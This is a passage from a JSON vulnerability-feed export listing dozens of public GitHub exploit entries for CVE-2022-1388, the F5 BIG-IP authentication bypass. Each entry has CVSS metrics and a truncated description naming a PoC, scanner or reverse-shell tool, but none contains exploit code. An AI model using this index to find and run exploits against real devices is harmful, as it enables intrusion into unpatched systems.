"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-28T12:43:18", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388"], "modified": "2022-05-28T12:43:29", "id": "0B2EA860-8578-5853-85A4-F3302749F815", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-25T19:51:28", "description": "# F5 BIG-IP iControl REST \u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e(CVE-2022-1...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-10T07:24:33", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388"], "modified": "2022-05-25T11:40:03", "id": "F37EDD30-724E-584E-9C9E-9B3E8C4C849C", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-15T16:17:38", "description": "# CVE-2022-1388\nF5 BIG-IP iControl REST\u8eab\u4efd\u9a8c\u8bc1\u7ed5\u8fc7\u6f0f\u6d1e\n\n\n# Optional Arg...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-09T14:02:34", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388"], "modified": "2022-05-15T13:30:09", "id": "1B09A058-8036-572B-905F-1054D924243B", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-15T07:10:57", "description": "# F5-BigIP-CVE-2022-1388\nReverse Shell for CVE-2022-1388\n\n**** D...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-10T04:44:05", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388"], "modified": "2022-05-15T02:58:27", "id": "CD47935C-F8CB-535E-9535-E95B6AE9A0FC", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-22T16:35:17", "description": "# CVE-2022-1388\nCVE-2022-1388 is a critical vulnerability (CVSS ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-11T00:15:07", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388"], "modified": "2022-06-22T13:24:19", "id": "9267A549-88B1-5288-8C2B-C4BCAD621D57", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-12T16:59:47", "description": "# CVE-2022-1388-POC\nBIG-IP iCONTROL REST API AUTH BYPASS /RCE EX...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-07T01:31:41", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388"], "modified": "2022-05-11T20:29:21", "id": "B38FDF75-522A-5254-9A3F-92C0D7B8CC99", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-23T04:17:49", "description": "# F5 CVE-2022-1388 Scanner\n[![forthebadge](https://forthebadge.c...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-11T17:43:44", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388"], "modified": "2022-05-23T01:22:04", "id": "8F0E3026-9DF1-5AA8-BECC-3F72A7A143C2", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-24T15:38:26", "description": "# CVE-2022-1388 by 1vere$k with command shell\nImproved POC for C...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-15T08:58:22", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388"], "modified": "2022-05-18T05:53:50", "id": "BDA05DEA-0BAD-5658-8E86-03A154FED355", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-30T14:04:29", "description": "# CVE-2022-1388-PocExp\nCVE-2022-1388-PocExp,\u65b0\u589e\u4e86\u591a\u7ebf\u7a0b\n# Usg...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-28T12:46:08", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388"], "modified": "2022-05-28T12:46:19", "id": "56C96510-5E6E-56F0-ABEC-852EF4E3F53C", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-21T10:10:28", "description": "# CVE-2022-1388\n## Checking and exploit for CVE-2022-1388\n\n#### ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-13T10:18:29", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388"], "modified": "2022-05-21T09:09:17", "id": "D4D3FB69-1A42-5FCE-BE50-5A025172F9CF", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-17T09:41:53", "description": "# CVE-2022-1388\nF5 BIG-IP iControl REST vulnerability RCE exploi...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-12T16:54:52", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388"], "modified": "2022-06-17T02:58:31", "id": "FF4560D1-137A-5C41-90E4-E8EECAB04134", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-18T14:57:31", "description": "# CVE-2022...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-10T09:12:22", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388"], "modified": "2022-05-18T08:46:17", "id": "60ABBBF7-1E1C-5205-A55E-11D051E0FCC7", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-18T14:59:56", "description": "# CVE-2022...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-10T09:12:22", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388"], "modified": "2022-05-18T08:46:17", "id": "B139A751-2E67-52F2-B040-B17D8D6D33A0", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-10T19:13:07", "description": "# BIG-IP iControl REST vulnerability CVE-2022-1388 PoC\n\n![f5logo...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-10T08:44:24", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388"], "modified": "2022-05-10T10:15:46", "id": "C807D3D7-EF10-5C00-8252-C9F4B2A7F1F3", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-09T16:09:28", "description": "# CVE-2022-1388\n\nhttps://support.f5.com/csp/article/K23605346\n\n\u6b64...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-09T03:20:46", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388"], "modified": "2022-05-09T03:30:48", "id": "71D52D12-0E56-5638-8E74-60EE2F8E569D", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-24T15:42:39", "description": "# CVE-2022-1388 by 1vere$k\nCVE-2022-1388 the proof-of-concept. ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-10T08:22:46", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388"], "modified": "2022-05-10T08:31:03", "id": "9973FA3C-C964-5036-934F-A49BFE7BC4EE", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-05T17:37:04", "description": "# CVE-2022-1388-rs\nScanner and Interactive shell for CVE-2022-13...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-17T10:51:39", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388"], "modified": "2022-06-05T16:51:30", "id": "2D1EC4D1-0622-570B-9758-054B79393D26", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-25T15:13:20", "description": "# Exploit-F5-CVE-2022-1388\nPoC For F5 BIG-IP - bash script Explo...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-10T02:57:31", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388"], "modified": "2022-06-25T15:12:05", "id": "40E34754-5867-501F-B0F2-FD63C406B6FB", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-09T11:37:42", "description": "## Vuln Impact\r\n\r\nThis vulnerability may allow an unauthenticate...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-09T14:01:38", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388"], "modified": "2022-06-09T10:44:05", "id": "C7725591-3B9A-58D3-9191-5325187E1B5E", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-05T11:32:29", "description": "# F5-CVE-2022-1388-Exploit\nExploit and Check Script for CVE 2022...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": 